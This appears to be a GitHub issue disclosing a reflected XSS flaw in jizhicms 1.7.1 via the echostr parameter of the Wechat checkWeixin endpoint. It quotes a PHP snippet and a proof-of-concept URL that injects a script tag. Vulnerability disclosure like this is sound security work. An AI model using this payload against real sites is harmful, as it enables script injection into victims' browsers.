A xss vulnerability was discovered in jizhicms 1.7.1
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of /index.php/Wechat/checkWeixin?signature=1&echostr=1
Vulnerability file: Home/c/WechatController.php
publicfunctionindex(){
if (isset($_GET['echostr'])){
$this->checkWeixin();
}else{
$this->responseMsg();
}
}
A xss vulnerability was discovered in jizhicms 1.7.1
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of /index.php/Wechat/checkWeixin?signature=1&echostr=1
Vulnerability file:
Home/c/WechatController.phpPoC:
http://example.com/index.php/Wechat/checkWeixin?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&echostr=<script>alert(1)</script>The text was updated successfully, but these errors were encountered: